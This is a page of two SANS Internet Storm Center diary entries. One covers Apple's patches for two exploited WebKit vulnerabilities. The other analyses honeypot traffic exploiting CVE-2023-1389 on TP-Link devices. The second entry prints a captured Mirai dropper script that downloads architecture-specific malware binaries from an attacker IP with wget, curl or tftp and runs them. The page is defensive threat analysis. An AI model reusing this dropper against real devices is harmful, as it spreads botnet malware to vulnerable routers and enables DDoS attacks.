Apple Patches Exploited WebKit Vulnerabilities in iOS/iPadOS/macOS

Published: 2023-11-30. Last Updated: 2023-12-01 17:21:37 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Apple today released patches for two WebKit vulnerabilities affecting macOS, iPadOS and iOS. I would expect standalone Safari updates for older macOS versions in the future. At this point, only the most recent operating system versions received patches.

The vulnerabilities have been exploited against versions of iOS before 16.7.1. iOS 16.7.2 is the latest iOS 16 release, released in late October. It is not clear if it is vulnerable. Apple just states which versions were successfully exploited. 

iOS 17.1.2 and iPadOS 17.1.2 macOS Sonoma 14.1.2
CVE-2023-42916 [moderate] WebKit
An out-of-bounds read was addressed with improved input validation.
 Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
x x
CVE-2023-42917 [critical] WebKit
A memory corruption vulnerability was addressed with improved locking.
 Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
x x

 

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Keywords:
0 comment(s)

Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today

Published: 2023-11-30. Last Updated: 2023-11-30 03:34:23 UTC
by John Bambenek (Version: 1)
0 comment(s)

Last week, Jonah Latimer posted here about traffic he saw to his own EC2 web honeypot exploiting CVE-2023-1389. I found this looking at new URL strings to our honepot network, and so for on 29 Nov 23, there have been about 300 detections for this vulnerability pulling a shell script from 45.95.146.26 a quick little shell script that does little more than figure out the architecture of the victim device and then attempt to download a architecture-specific variant of Mirai.

binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="45.95.146.26"\
binout="system"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
  do
    rm -rf $arch
    cd /tmp || cd /var || cd /dev; wget http://$server_ip/g/$arch -O $binout || curl -O $binout http://$server_ip/g/$arch || tftp -g -l $binout -r $arch $server_ip
    chmod 777 $binout
    status=`./$binout $1`
    if [ "$status" = "$exec" ]; then
        rm -rf $binout
        break
    fi
    rm -rf $binout
  done

The same IP hosted those binaries which were first seen on Virustotal on 24 November 2023 (See the ARM version report on VT here).

If you take a look at our own data and generalize the exploit (example here) you see one spike in August and roughly small "noise level" exploitation and then today which so far has surpassed all our previous observation of exploit activity.

The mitigation advice is the same, these devices probably shouldn't have internet facing admin panels but unfortunately the class of device suggests the people running them are also not likely reading such guidance much less have the ability or wherewithall to fix the issue and/or update their firmware.

It should be pointed out that in the current environment of heightened geopolitical activity, DDoS is often the first lever used by individuals who want to project that same conflict online which makes the expansion of Mirai that much more concerning.

--
John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Labs - Well Fed Intelligence

Keywords: cve20231389 honeypot mirai tplink
0 comment(s)
ISC Stormcast For Thursday, November 30th, 2023 https://isc.sans.edu/podcastdetail/8758

Comments

Login here to join the discussion.


Diary Archives